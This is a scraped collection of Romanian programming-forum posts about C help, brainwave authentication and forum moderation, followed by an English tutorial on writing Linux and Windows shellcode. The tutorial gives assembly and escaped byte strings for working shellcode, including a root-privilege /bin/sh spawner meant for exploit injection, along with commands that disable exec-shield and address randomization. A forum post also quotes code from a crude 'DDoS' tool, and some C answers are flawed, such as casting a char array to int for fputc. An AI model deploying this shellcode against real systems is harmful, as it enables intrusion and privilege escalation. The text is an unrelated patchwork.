M2G

Trimis. Nu am am deocamdata altele. Poate luna viitoare.

Trimis, mai am una.

Cea mai mare problema in acea sursa sunt numele de variabile. Sunt scrise in modul in care le scrie lumea la liceu. Variabile cu nume a,b,c etc... Chiar daca scrii tu acel program cu asa nume de variabile, dupa o luna daca te uiti peste el nu mai stii ce face, chiar daca are comentarii. Vad ca sunt comentarii in dreptul variabilelor ia redenumeste acele variabile ceva de genu: s -> inputStr sau input_str sau inputString c -> operands etc... Si schimbi asa pentru fieacare loc in care apar. O sa il intelegi mult mai usor. Nu am timp sa fac asta pentru ca sunt la servici dar incearca tu, nu pare complicat.

Fedora 18, pentru ca Ubuntu suge.

Nu prea cred ca e posibil sa faci sniffing in ganduri deoarece acea casca iti recunoaste anumite semnale cerebrale. Sa zicem ca eu ma gandesc la o minge si se apind zonele x,y,z cu intensitatile a,b,c. Daca tu te gandesti la o minge pot sa ti se activeze aceleasi zone(sau altele) si cu alte intensitati. Cam ce ai putea sa alfi cu sniffingul asta de ganduri ar fi emotia pe care ti-o transmite gandul, fericire, tristete, frica. Dar nu si ceea la ce te gandesti concret. Cel putin mie asa mi se pare. Eu as fi curios ce s-ar intampla daca persoana X este insurata/maritata si isi pune o parola cu gandul "nunta". Foloseste parola asta 2 ani si pe urma divorteaza. Daca in urma divortului a ramas cu anumite traume si isi schimba perceptia despre acel moment "nunta", ma intreb daca se mai poate loga pe facebook. Nu am citit inca acel paper dar banuiesc ca pe termen scurt, se genereaza acelasi semnal cerebral dar pe masura ce evoluam ne putem schimba perceptia despre anumite lucruri si asta ar putea afecta sistemul.

Scanare ocular?? Verificate în doi pa?i? Prea pu?in! Cercet?torii americani au ridicat ?tacheta în ceea ce prive?te siguran?a parolelor propunând ?i testând utilizarea cele mai personale, mai intime parole din câte exist?: un gând al utilizatorului. Speciali?tii de la Facultatea de Informatic? a Universit??ii California - Berkeley au creat un dispozitiv care verific? identitatea utilizatorului pe baza undelor cerebrale, înregistrate prin electroencefalogram? (EEG). În locul parolelor alfanumerice folosite în mod obi?nuit, acest dispozitiv utilizeaz? ca „parol?” un gând. Echipa de cercet?tori, condus? de John Chuang, a dezvoltat metoda folosind un sistem simplu de captare a undelor cerebrale, o „casc?” Neurosky Mindset, în valoare de 100 $, care utilizeaz? tehnologia Bluetooth pentru a autentifica utilizatorii. Cu ajutorul undelor cerebrale, autentificarea se poate face cu un grad foarte mare de precizie. În timp ce purtau c??tile, voluntarii au realizat 7 mintal ac?iuni, timp în care cercet?torii le-au înregistrat undele cerebrale. Ini?ial, to?ii participan?ii au îndeplinit acelea?i 3 sarcini: s-au concentrat asupra respira?iei, apoi ?i-au imaginat c? î?i mi?c? un deget în sus ?i în jos, iar în al treilea rând au trebuit s? asculte un anumit sunet ?i s? se reac?ioneze concentrându-se asupra unui punct de pe o hârtie, atunci când auzeau sunetul respectiv. Înregistrarea ?i m?surarea undelor cerebrale în cursul acestor activit??i a dus la crearea unui tipar de referin?? pentru fiecare participant. Pentru ultimele 4 sarcini, voluntarii au putut s? aleag? un gând mai personalizat. Putea s? se imagineze f?când o mi?care repetitiv? dintr-un sport la alegere, de pild? lovind o minge sau manevrând o bât? de baseball. Puteau s? se gândeasc? la un cântec sau s? î?i reprezinte mintal un grup de obiecte de o anumit? culoare. Sau puteau s? î?i aleag? singuri la ce s? se gândeasc? ?i s? se concentreze asupra acestui gând timp de 10 secunde. Studiind undele cerebrale ale subiec?ilor în timpul ac?iunilor mintale personalizate ?i corelându-le cu parametrii de referin??, cercet?torii au putut identifica o „semn?tur? EEG” distinct? pentru fiecare utilizator. Astfel, chiar în cazul pu?in probabil în care doi voluntari s-ar gândi la acela?i lucru, semn?tura EEG unic? a fiec?ruia dintre ei ar împiedica spargerea „parolei mentale” a unuia de c?tre cel?lalt. Personalizând modul de autentificare în acest mod, cu ajutorul c??tilor folosite, rata de eroare a fost sub 1%, comparabil? cu cea ob?inut? prin metode mai invazive de m?surare a semnalelor EEG. „Am constatat c? semnalele cerebrale, chiar înregistrate cu ajutorul unor senzori EEG non-invazivi ?i ieftini, într-o ambian?? obi?nuit?, pot fi folosite pentru a autentifica utlizatorii cu un grad înalt de precizie”, au declarat cercet?torii, într-un comunicat de pres? transmis de universitate. Speciali?tii au dat detalii despre tehinca folosit? ?i rezultatele ob?inute într-o lucrare publicat? sub titlul: “I Think, Therefore I Am: Usability and Security of Authentication Using Brainwaves.” Sursa Sursa sursei Paperul cu aceasta cercetare: http://people.ischool.berkeley.edu/~chuang/pubs/usec13.pdf

Probabil ca iti suporta compilatorul si de asta merge dar nu este un standard pentru asta. Cei care fac compilatoarele trebuie sa urmeze anumite standarde, daca asta nu este specificat in standardul C++ nu poti zice ca e ceva valid doar pentru ca merge pe compilatorul x cand pe altele k poate sa nu mearga. Oricum, nici scanf nu prea ar mai trebui sa fie folosit. Mai multe aici: Things to Avoid in C/C++ -- fflush(stdin), Part 2 - GIDNetwork FAQ > Flush the input buffer - Cprogramming.com Ai aici un macro care face flush la input stream. how to properly flush the input stream (stdin) | DaniWeb #define FLUSH_STDIN(x) {if(x[strlen(x)-1]!='\n'){do fgets(Junk,16,stdin);while(Junk[strlen(Junk)-1]!='\n');}else x[strlen(x)-1]='\0';} apelezi cu: FLUSH_STDIN(Variabila_pe_care_o_vrei_curatata); Am mai vazut ca unii mai folosesc si: fseek(stdin,0,SEEK_END);

Asa spun alti baieti pe forumuri. Depinde de compilator, in cel de la microsoft cica merge, in altele e posibil sa nu mearga pentru ca nu este un standard ansi C. Deci comportamentul sau e undefined. Uite niste referinte: fflush(stdin) c++ - Using fflush(stdin) - Stack Overflow Poate ar trebui sa ii arati astea profesorului tau sau sa-i dai adresa forumului sa isi faca cont.

Inca cateva chestii: Am uitat, fputc iti scrie doar un caracter. fputs iti scrie un string. Lucrul cu structurile este usor. Poti sa te gandesti la o structura ca si la o clasa de lucruri. Si pe care o definesti ca pe o variabila. Daca luam exemplul tau cu produsul, ai avea un concept produs catre trebuie descris. Pentru a face aste te gandesti la ce proprietati are un produs si ajungi la concluzia ca are un cod de produs, un nume si o unitate de masura(litri, kg etc). In C nu ai tipuri de variabile pentru tot ce exista pe aceasta lume, din cauza asta trebuie sa iti definesti tu tipul. Deci ai o structura care iti defineste produsul. Daca ne gandim la cele 3 proprietati identificate pe rand avem asa: codul de produs este un numar, deci o sa ai un int. Dupa asta te gandesti ca acel cod poate sa fie foarte mare asa ca poti sa faci acest atribut long. numele produsului este un text, deci ai facut un array de 100 caractere care formeaza numele prodului unitatea de masura poate sa fie orice de la kg, litru, metrii etc asa ca pentru simplitate si pentru a nu defini fiecare tip, poti sa faci si acest atribut ca si string. Deci ti-ai definit o variabila de tip produs cu caracteristicle descoperite mai sus struct produse{ long cod; char nume[100]; char unitate[20]; }; Dupa asta ai zis ca vrei sa folosesti ace structura ca pe orice alta variabila(primitiva). Cum este int, char etc... typedef struct produse PRODUS; Dupa asta ai initializat variabila: PRODUS p; Pentru ca multe functii iti cer un pointer la tipul de date, ai creat un pointer catre variabila PRODUS si ai zis ca sa pointeze catre adresa lui PRODUS p astfel ca accesezi variabila p prin intermediul pointerului care reprezinta adresa la care se gaseste p in memorie. PRODUS *pp = &p // pointer la tipul PRODUS este egal cu adresa variabilei p; Dupa asta ai accesat campurile structurii, asta o faci ca si lucrul cu orice alta variabila: Exemplu: pp->cod = 542; este acelasi lucru ca si cum ai asigna o valoare unui long. long cod = 542 La fel si cu celelalte variabile de tip char. Atentie! Daca ai un pointer cum este pp trebuie sa accesezi campurile structurii PRODUS prin -> Adica: pp->nume Daca nu ai pointer la structura si vrei sa o folosesti in mod normal, trebuie sa accesezi campurile cu . Adica: p.nume Intotdeauna folosesti -> pentru pointeri si . pentru variabile care nu sunt pointeri. De ce sunt utile structurile? Structurile sunt utile pentru ca daca ai de exemplu o functie care ia ca si argumente un Angajat si sa zicem un departament pe care este angajat, este mult mai simplu de folosit decat in cazul in care ar trebui sa pui variabila pentru fiecare atribut ale acestor doua concepte. Exemplu: struct Angajat { long cod; char[100] nume; char[100] adresa; float salar; }; struct Departament { long cod; char[100] nume; char[100] sef; char[100] locatie; }; //ai functia: void arataDetaliiAngajat(Angajat a, Departament d); Sau daca nu ai folosi structuri si ai vrea sa faci aceasi functie, ar arata ceva de genul: void arataDetaliiAngajat(long cod_angajat, char *nume_angajat, char *adresa_angajat, float salar_angajat, long cod_departament, char *nume_departament, char *sef_departament, char *locatie_departament) Care dintre cele doua exemple de functii ti se pare mai usor de folosit? Ce s-ar intampla daca Angajat si Departament ar avea si alte atribute mai complexe? Cum ar arata atunci functia daca nu ai folosi structuri ci doar variabile primitive cum sunt int, long, char etc... ? Daca nu ai inteles si mai ai intrebari posteaza si incercam sa te ajutam. Bafta!

Poate sunt ceva erori din cauza castului la int. Foloseste fprintf pentru a scrie in fisier si merge ok. void adaugare() { struct produse{ long cod; char nume[100]; char unitate[20]; }; typedef struct produse PRODUS; PRODUS p; PRODUS *pp = &p; FILE *f=fopen("produse.txt","wt"); if(f==NULL) { printf("\n Eroare, fisierul nu exista!"); exit(1); } printf("\n Introduceti: Cod Produs, Nume, Unitate de masura \n"); scanf("%ld ",&pp->cod); fprintf(f,"%ld ",pp->cod); gets(pp->nume); fputc((int)pp->nume, f); gets(pp->unitate); fprintf(f,"%s ",pp->unitate); fclose(f); }

1. Functia ta "adaugare" este de tipul void si tu incerci sa returnezi un int in momentul in care exista o eroare de deschidere a fisierului. Solutie: foloseste exit(1) pentru a iesi din program cu cod de eroare. 2. fputc are definitia: int fputc ( int character, FILE * stream );. Tu le-ai pus invers. Fa un cast explicit la int, adica: "(int)pp->nume" 3. PRODUS *p; este un pointer neinitializat. Solutie: PRODUS p; // initializezi o structura p. PRODUS *pp = &p; // faci un pointer care sa pointeze la adresa structurii. In continure folosesti pp in loc de p. 4. Sa nu mai folosesti fflush(stdin) pentru ca ajungi in undefined behaviour. Codul complet: void adaugare() { struct produse{ long cod; char nume[100]; char unitate[20]; }; typedef struct produse PRODUS; PRODUS p; PRODUS *pp = &p; FILE *f=fopen("produse.txt","wt"); if(f==NULL) { printf("\n Eroare, fisierul nu exista!"); exit(1); } printf("\n Introduceti: Cod Produs, Nume, Unitate de masura \n"); scanf("%ld ",&pp->cod); fprintf(f,"%ld ",pp->cod); gets(pp->nume); fputc((int)pp->nume, f); gets(pp->unitate); fputc((int)pp->unitate, f); fclose(f); }

Si ce crezi ca inseamna? Iti zice eroarea exact care e problema. Nu ai facut o indentare. Posteaza codul in tagul ca sa vedem si formatarea.Python nu contine {} ca sa delimiteze blocurile de cod din structurile de control. Aici se foloseste identarea (se recomanda 4 spatii).

Pentru ca sunt bine dispus azi ti-am modificat postul si am adaugat linkul fara refer. Linkurile cu ref nu sunt permise pe forum. Poti pune un link cu ref daca pui si linkul fara ref. Astfel ca utilizatorii sa ia o decizie pe care sa intre, daca vor sa te ajute sau nu. Next time, warn.

Fara banci, vodafoane si alte chestii de genul asta. Nu incurajam frauda!

Nu incurajam asa ceva.

Pare clean dar pentru ddos e cam useless. Cand apesi pe "atack" face asta: Vesriunea 1 din arhiva: private void LoopAttack_Tick(object sender, EventArgs e) { this.WebBrowser1.Navigate(this.TextURL.Text); this.WebBrowser2.Navigate(this.TextURL.Text); this.WebBrowser3.Navigate(this.TextURL.Text); this.WebBrowser4.Navigate(this.TextURL.Text); this.WebBrowser5.Navigate(this.TextURL.Text); this.Label3.Text = Conversions.ToString(Conversions.ToDouble(this.Label3.Text) + 1.0); this.Label3.Text = Conversions.ToString(Conversions.ToDouble(this.Label3.Text) + 1.0); this.Label3.Text = Conversions.ToString(Conversions.ToDouble(this.Label3.Text) + 1.0); this.Label3.Text = Conversions.ToString(Conversions.ToDouble(this.Label3.Text) + 1.0); this.Label3.Text = Conversions.ToString(Conversions.ToDouble(this.Label3.Text) + 1.0); }

Nu e posibil sa faci asa ceva! Sa iti explic si de ce. 1) In momentul in care un semnal trece printr-un cablu acesta este vulnerabil la zgomot(perturbatii exterioare). Pentru a nu se intampla asta si pentru ca semnalul sa aiba o rata mare de eficienta in drumul sau de la sursa la destinatie se foloseste ecranarea. Adica acel fir este protejat de perturbatiile exterioare prin anumite straturi de material(diferit la fiecare in functie de unde este utilizat acel cablu). Daca tu actionezi cu un semnal asupra acelui cablu(semnal wireless sau bluetooth care este imposibil, explic mai jos de ce) o sa reusesti sa faci un bruiaj in cel mai fericit caz. 2) Informatia intr-un calculator este reprezentata in mod digital, adica in valori de 1 si 0. Pentru un transfer de date dintre doua sisteme folosind un cablu se fac doua conversii de semnal. Cand semnalul pleaca de la calculator sufera o conversie de la digital la analogic folosind un DAC(digital to analog converter). Astfel prin cablu va fi un semnal analogic. In momentul in care semnalul ajunge la calculatorul destinatie se foloseste un convertor ADC (analog to digital converter) care face operatia inversa al DAC. Transforma semnalul analogic in semnal digital. Semnalul wireless este un semnal de tip radio sau iR. Nu ai cum sa influentezi semnalul din cablu cu un astfel de semnal. Poate doar daca pe cablu ar fi un adaptor care sa faca conversii dar care este foarte greu de realizat astfel incat sa nu se corupa datele. Chiar daca ai reusi sa introduci un anumit semnal in acel fir urmatoare problema ar fi ca nu stii cum sa modifici semnalul astfel incat sa nu se corupa si mai ajunga si la destinatie. Vezi stiva TCP/IP si modelul de referinta OSI.

http://i.imgur.com/Q3cUg29.gif

Fonturile de la ultimele postari/threaduri/stiri is naspa, se vede rau. In rest imi place.

Dar ce este? Pune un scan sau ceva, eu nu descarc prostii ca sunt pe calculatorul de la servici.

Frequently Asked Questions 1. What is shellcoding? In computer security, shellcoding in its most literal sense, means writing code that will return a remote shell when executed. The meaning of shellcode has evolved, it now represents any byte code that will be inserted into an exploit to accomplish a desired task. 2. There are tons of shellcode repositories all around the internet, why should I write my own? Yes, you are correct, there are tons of repositories all around the internet for shellcoding. Namely, the metasploit project seems to be the best. Writing an exploit can be difficult, what happens when all of the prewritten blocks of code cease to work? You need to write your own! Hopefully this tutorial will give you a good head start. 3. What do I need to know before I begin? A decent understanding of x86 assembly, C, and knowledge of the Linux and Windows operating systems. 4. What are the differences between windows shellcode and Linux shellcode? Linux, unlike windows, provides a direct way to interface with the kernel through the int 0x80 interface. A complete listing of the Linux syscall table can be found here. Windows on the other hand, does not have a direct kernel interface. The system must be interfaced by loading the address of the function that needs to be executed from a DLL (Dynamic Link Library). The key difference between the two is the fact that the address of the functions found in windows will vary from OS version to OS version while the int 0x80 syscall numbers will remain constant. Windows programmers did this so that they could make any change needed to the kernel without any hassle; Linux on the contrary has fixed numbering system for all kernel level functions, and if they were to change, there would be a million angry programmers (and a lot of broken code). 5. So, what about windows? How do I find the addresses of my needed DLL functions? Don't these addresses change with every service pack upgrade? There are multitudes of ways to find the addresses of the functions that you need to use in your shellcode. There are two methods for addressing functions; you can find the desired function at runtime or use hard coded addresses. This tutorial will mostly discuss the hard coded method. The only DLL that is guaranteed to be mapped into the shellcode's address space is kernel32.dll. This DLL will hold LoadLibrary and GetProcAddress, the two functions needed to obtain any functions address that can be mapped into the exploits process space. There is a problem with this method though, the address offsets will change with every new release of Windows (service packs, patches etc.). So, if you use this method your shellcode will ONLY work for a specific version of Windows. Further dynamic addressing will be referenced at the end of the paper in the Further Reading section. 6. What's the hype with making sure the shellcode won't have any NULL bytes in it? Normal programs have lots of NULL bytes! Well this isn't a normal program! The main problem arises in the fact that when the exploit is inserted it will be a string. As we all know, strings are terminated with a NULL byte (C style strings anyhow). If we have a NULL byte in our shellcode things won't work correctly. 7. Why does my shellcode program crash when I run it? Well, in most shellcode the assembly contained within has some sort of self modifying qualities. Since we are working in protected mode operating systems the .code segment of the executable image is read only. That is why the shell program needs to copy itself to the stack before attempting execution. 8. Can I contact you? Sure, just email shanna@uiuc.edu. Feel free to ask questions, comments, or correct something that is wrong in this tutorial. 9. Why did you use intel syntax, UGHHH?! I don't know! I honestly prefer at&t syntax, but for some reason I felt compelled to do this in intel syntax. I am really sorry! 10. Why does my program keep segfaulting? Yes, I read item 7 above, but it STILL crashes. You probably are using an operating system with randomized stack and address space and possibly a protection mechanism that prevents you from executing code on the stack. All Linux based operating systems are not the same, so I present a solution for Fedora that should adapt easily. echo 0 > /proc/sys/kernel/exec-shield #turn it off echo 0 > /proc/sys/kernel/randomize_va_space #turn it off echo 1 > /proc/sys/kernel/exec-shield #turn it on echo 1 > /proc/sys/kernel/randomize_va_space #turn it on Background Information EAX, EBX, ECX, and EDX are all 32-bit General Purpose Registers on the x86 platform. AH, BH, CH and DH access the upper 16-bits of the GPRs. AL, BL, CL, and DL access the lower 8-bits of the GPRs. ESI and EDI are used when making Linux syscalls. Syscalls with 6 arguments or less are passed via the GPRs. XOR EAX, EAX is a great way to zero out a register (while staying away from the nefarious NULL byte!) In Windows, all function arguments are passed on the stack according to their calling convention. Required Tools gcc ld nasm objdump Optional Tools odfhex.c - a utility created by me to extract the shellcode from "objdump -d" and turn it into escaped hex code (very useful!). arwin.c - a utility created by me to find the absolute addresses of windows functions within a specified DLL. shellcodetest.c - this is just a copy of the c code found below. it is a small skeleton program to test shellcode. exit.asm hello.asm msgbox.asm shellex.asm sleep.asm adduser.asm - the source code found in this document (the win32 shellcode was written with Windows XP SP1). Linux Shellcoding When testing shellcode, it is nice to just plop it into a program and let it run. The C program below will be used to test all of our code. /*shellcodetest.c*/ char code[] = "bytecode will go here!"; int main(int argc, char **argv) { int (*func)(); func = (int ()) code; (int)(*func)(); } Example 1 - Making a Quick Exit The easiest way to begin would be to demonstrate the exit syscall due to it's simplicity. Here is some simple asm code to call exit. Notice the al and XOR trick to ensure that no NULL bytes will get into our code. ;exit.asm [SECTION .text] global _start _start: xor eax, eax ;exit is syscall 1 mov al, 1 ;exit is syscall 1 xor ebx,ebx ;zero out ebx int 0x80 Take the following steps to compile and extract the byte code. steve hanna@1337b0x:~$ nasm -f elf exit.asm steve hanna@1337b0x:~$ ld -o exiter exit.o steve hanna@1337b0x:~$ objdump -d exiter exiter: file format elf32-i386 Disassembly of section .text: 08048080 <_start>: 8048080: b0 01 mov $0x1,%al 8048082: 31 db xor %ebx,%ebx 8048084: cd 80 int $0x80 The bytes we need are b0 01 31 db cd 80. Replace the code at the top with: char code[] = "\xb0\x01\x31\xdb\xcd\x80"; Now, run the program. We have a successful piece of shellcode! One can strace the program to ensure that it is calling exit. Example 2 - Saying Hello For this next piece, let's ease our way into something useful. In this block of code one will find an example on how to load the address of a string in a piece of our code at runtime. This is important because while running shellcode in an unknown environment, the address of the string will be unknown because the program is not running in its normal address space. ;hello.asm [SECTION .text] global _start _start: jmp short ender starter: xor eax, eax ;clean up the registers xor ebx, ebx xor edx, edx xor ecx, ecx mov al, 4 ;syscall write mov bl, 1 ;stdout is 1 pop ecx ;get the address of the string from the stack mov dl, 5 ;length of the string int 0x80 xor eax, eax mov al, 1 ;exit the shellcode xor ebx,ebx int 0x80 ender: call starter ;put the address of the string on the stack db 'hello' steve hanna@1337b0x:~$ nasm -f elf hello.asm steve hanna@1337b0x:~$ ld -o hello hello.o steve hanna@1337b0x:~$ objdump -d hello hello: file format elf32-i386 Disassembly of section .text: 08048080 <_start>: 8048080: eb 19 jmp 804809b 08048082 <starter>: 8048082: 31 c0 xor %eax,%eax 8048084: 31 db xor %ebx,%ebx 8048086: 31 d2 xor %edx,%edx 8048088: 31 c9 xor %ecx,%ecx 804808a: b0 04 mov $0x4,%al 804808c: b3 01 mov $0x1,%bl 804808e: 59 pop %ecx 804808f: b2 05 mov $0x5,%dl 8048091: cd 80 int $0x80 8048093: 31 c0 xor %eax,%eax 8048095: b0 01 mov $0x1,%al 8048097: 31 db xor %ebx,%ebx 8048099: cd 80 int $0x80 0804809b <ender>: 804809b: e8 e2 ff ff ff call 8048082 80480a0: 68 65 6c 6c 6f push $0x6f6c6c65 Replace the code at the top with: char code[] = "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x05\xcd"\ "\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x68\x65\x6c\x6c\x6f"; At this point we have a fully functional piece of shellcode that outputs to stdout. Now that dynamic string addressing has been demonstrated as well as the ability to zero out registers, we can move on to a piece of code that gets us a shell. Example 3 - Spawning a Shell This code combines what we have been doing so far. This code attempts to set root privileges if they are dropped and then spawns a shell. Note: system("/bin/sh") would have been a lot simpler right? Well the only problem with that approach is the fact that system always drops privileges. Remember when reading this code: execve (const char *filename, const char** argv, const char** envp); So, the second two argument expect pointers to pointers. That's why I load the address of the "/bin/sh" into the string memory and then pass the address of the string memory to the function. When the pointers are dereferenced the target memory will be the "/bin/sh" string. ;shellex.asm [SECTION .text] global _start _start: xor eax, eax mov al, 70 ;setreuid is syscall 70 xor ebx, ebx xor ecx, ecx int 0x80 jmp short ender starter: pop ebx ;get the address of the string xor eax, eax mov [ebx+7 ], al ;put a NULL where the N is in the string mov [ebx+8 ], ebx ;put the address of the string to where the ;AAAA is mov [ebx+12], eax ;put 4 null bytes into where the BBBB is mov al, 11 ;execve is syscall 11 lea ecx, [ebx+8] ;load the address of where the AAAA was lea edx, [ebx+12] ;load the address of the NULLS int 0x80 ;call the kernel, WE HAVE A SHELL! ender: call starter db '/bin/shNAAAABBBB' steve hanna@1337b0x:~$ nasm -f elf shellex.asm steve hanna@1337b0x:~$ ld -o shellex shellex.o steve hanna@1337b0x:~$ objdump -d shellex shellex: file format elf32-i386 Disassembly of section .text: 08048080 <_start>: 8048080: 31 c0 xor %eax,%eax 8048082: b0 46 mov $0x46,%al 8048084: 31 db xor %ebx,%ebx 8048086: 31 c9 xor %ecx,%ecx 8048088: cd 80 int $0x80 804808a: eb 16 jmp 80480a2 0804808c : 804808c: 5b pop %ebx 804808d: 31 c0 xor %eax,%eax 804808f: 88 43 07 mov %al,0x7(%ebx) 8048092: 89 5b 08 mov %ebx,0x8(%ebx) 8048095: 89 43 0c mov %eax,0xc(%ebx) 8048098: b0 0b mov $0xb,%al 804809a: 8d 4b 08 lea 0x8(%ebx),%ecx 804809d: 8d 53 0c lea 0xc(%ebx),%edx 80480a0: cd 80 int $0x80 080480a2 : 80480a2: e8 e5 ff ff ff call 804808c 80480a7: 2f das 80480a8: 62 69 6e bound %ebp,0x6e(%ecx) 80480ab: 2f das 80480ac: 73 68 jae 8048116 80480ae: 58 pop %eax 80480af: 41 inc %ecx 80480b0: 41 inc %ecx 80480b1: 41 inc %ecx 80480b2: 41 inc %ecx 80480b3: 42 inc %edx 80480b4: 42 inc %edx 80480b5: 42 inc %edx 80480b6: 42 inc %edx Replace the code at the top with: char code[] = "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb"\ "\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89"\ "\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd"\ "\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f"\ "\x73\x68\x58\x41\x41\x41\x41\x42\x42\x42\x42"; This code produces a fully functional shell when injected into an exploit and demonstrates most of the skills needed to write successful shellcode. Be aware though, the better one is at assembly, the more functional, robust, and most of all evil, one's code will be. Windows Shellcoding Example 1 - Sleep is for the Weak! In order to write successful code, we first need to decide what functions we wish to use for this shellcode and then find their absolute addresses. For this example we just want a thread to sleep for an allotted amount of time. Let's load up arwin (found above) and get started. Remember, the only module guaranteed to be mapped into the processes address space is kernel32.dll. So for this example, Sleep seems to be the simplest function, accepting the amount of time the thread should suspend as its only argument. G:\> arwin kernel32.dll Sleep arwin - win32 address resolution program - by steve hanna - v.01 Sleep is located at 0x77e61bea in kernel32.dll ;sleep.asm [SECTION .text] global _start _start: xor eax,eax mov ebx, 0x77e61bea ;address of Sleep mov ax, 5000 ;pause for 5000ms push eax call ebx ;Sleep(ms); steve hanna@1337b0x:~$ nasm -f elf sleep.asm; ld -o sleep sleep.o; objdump -d sleep sleep: file format elf32-i386 Disassembly of section .text: 08048080 <_start>: 8048080: 31 c0 xor %eax,%eax 8048082: bb ea 1b e6 77 mov $0x77e61bea,%ebx 8048087: 66 b8 88 13 mov $0x1388,%ax 804808b: 50 push %eax 804808c: ff d3 call *%ebx Replace the code at the top with: char code[] = "\x31\xc0\xbb\xea\x1b\xe6\x77\x66\xb8\x88\x13\x50\xff\xd3"; When this code is inserted it will cause the parent thread to suspend for five seconds (note: it will then probably crash because the stack is smashed at this point ). Example 2 - A Message to say "Hey" This second example is useful in the fact that it will show a shellcoder how to do several things within the bounds of windows shellcoding. Although this example does nothing more than pop up a message box and say "hey", it demonstrates absolute addressing as well as the dynamic addressing using LoadLibrary and GetProcAddress. The library functions we will be using are LoadLibraryA, GetProcAddress, MessageBoxA, and ExitProcess (note: the A after the function name specifies we will be using a normal character set, as opposed to a W which would signify a wide character set; such as unicode). Let's load up arwin and find the addresses we need to use. We will not retrieve the address of MessageBoxA at this time, we will dynamically load that address. G:\>arwin kernel32.dll LoadLibraryA arwin - win32 address resolution program - by steve hanna - v.01 LoadLibraryA is located at 0x77e7d961 in kernel32.dll G:\>arwin kernel32.dll GetProcAddress arwin - win32 address resolution program - by steve hanna - v.01 GetProcAddress is located at 0x77e7b332 in kernel32.dll G:\>arwin kernel32.dll ExitProcess arwin - win32 address resolution program - by steve hanna - v.01 ExitProcess is located at 0x77e798fd in kernel32.dll ;msgbox.asm [SECTION .text] global _start _start: ;eax holds return value ;ebx will hold function addresses ;ecx will hold string pointers ;edx will hold NULL xor eax,eax xor ebx,ebx ;zero out the registers xor ecx,ecx xor edx,edx jmp short GetLibrary LibraryReturn: pop ecx ;get the library string mov [ecx + 10], dl ;insert NULL mov ebx, 0x77e7d961 ;LoadLibraryA(libraryname); push ecx ;beginning of user32.dll call ebx ;eax will hold the module handle jmp short FunctionName FunctionReturn: pop ecx ;get the address of the Function string xor edx,edx mov [ecx + 11],dl ;insert NULL push ecx push eax mov ebx, 0x77e7b332 ;GetProcAddress(hmodule,functionname); call ebx ;eax now holds the address of MessageBoxA jmp short Message MessageReturn: pop ecx ;get the message string xor edx,edx mov [ecx+3],dl ;insert the NULL xor edx,edx push edx ;MB_OK push ecx ;title push ecx ;message push edx ;NULL window handle call eax ;MessageBoxA(windowhandle,msg,title,type); Address ender: xor edx,edx push eax mov eax, 0x77e798fd ;exitprocess(exitcode); call eax ;exit cleanly so we don't crash the parent program ;the N at the end of each string signifies the location of the NULL ;character that needs to be inserted GetLibrary: call LibraryReturn db 'user32.dllN' FunctionName call FunctionReturn db 'MessageBoxAN' Message call MessageReturn db 'HeyN' [steve hanna@1337b0x]$ nasm -f elf msgbox.asm; ld -o msgbox msgbox.o; objdump -d msgbox msgbox: file format elf32-i386 Disassembly of section .text: 08048080 <_start>: 8048080: 31 c0 xor %eax,%eax 8048082: 31 db xor %ebx,%ebx 8048084: 31 c9 xor %ecx,%ecx 8048086: 31 d2 xor %edx,%edx 8048088: eb 37 jmp 80480c1 0804808a : 804808a: 59 pop %ecx 804808b: 88 51 0a mov %dl,0xa(%ecx) 804808e: bb 61 d9 e7 77 mov $0x77e7d961,%ebx 8048093: 51 push %ecx 8048094: ff d3 call *%ebx 8048096: eb 39 jmp 80480d1 08048098 : 8048098: 59 pop %ecx 8048099: 31 d2 xor %edx,%edx 804809b: 88 51 0b mov %dl,0xb(%ecx) 804809e: 51 push %ecx 804809f: 50 push %eax 80480a0: bb 32 b3 e7 77 mov $0x77e7b332,%ebx 80480a5: ff d3 call *%ebx 80480a7: eb 39 jmp 80480e2 080480a9 : 80480a9: 59 pop %ecx 80480aa: 31 d2 xor %edx,%edx 80480ac: 88 51 03 mov %dl,0x3(%ecx) 80480af: 31 d2 xor %edx,%edx 80480b1: 52 push %edx 80480b2: 51 push %ecx 80480b3: 51 push %ecx 80480b4: 52 push %edx 80480b5: ff d0 call *%eax 080480b7 : 80480b7: 31 d2 xor %edx,%edx 80480b9: 50 push %eax 80480ba: b8 fd 98 e7 77 mov $0x77e798fd,%eax 80480bf: ff d0 call *%eax 080480c1 : 80480c1: e8 c4 ff ff ff call 804808a 80480c6: 75 73 jne 804813b 80480c8: 65 gs 80480c9: 72 33 jb 80480fe 80480cb: 32 2e xor (%esi),%ch 80480cd: 64 fs 80480ce: 6c insb (%dx),%es:(%edi) 80480cf: 6c insb (%dx),%es:(%edi) 80480d0: 4e dec %esi 080480d1 : 80480d1: e8 c2 ff ff ff call 8048098 80480d6: 4d dec %ebp 80480d7: 65 gs 80480d8: 73 73 jae 804814d 80480da: 61 popa 80480db: 67 addr16 80480dc: 65 gs 80480dd: 42 inc %edx 80480de: 6f outsl %ds:(%esi),(%dx) 80480df: 78 41 js 8048122 80480e1: 4e dec %esi 080480e2 : 80480e2: e8 c2 ff ff ff call 80480a9 80480e7: 48 dec %eax 80480e8: 65 gs 80480e9: 79 4e jns 8048139 Replace the code at the top with: char code[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a\xbb\x61\xd9"\ "\xe7\x77\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb\x32"\ "\xb3\xe7\x77\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x03\x31\xd2\x52\x51"\ "\x51\x52\xff\xd0\x31\xd2\x50\xb8\xfd\x98\xe7\x77\xff\xd0\xe8\xc4\xff"\ "\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc2\xff\xff"\ "\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff"\ "\xff\x48\x65\x79\x4e"; This example, while not useful in the fact that it only pops up a message box, illustrates several important concepts when using windows shellcoding. Static addressing as used in most of the example above can be a powerful (and easy) way to whip up working shellcode 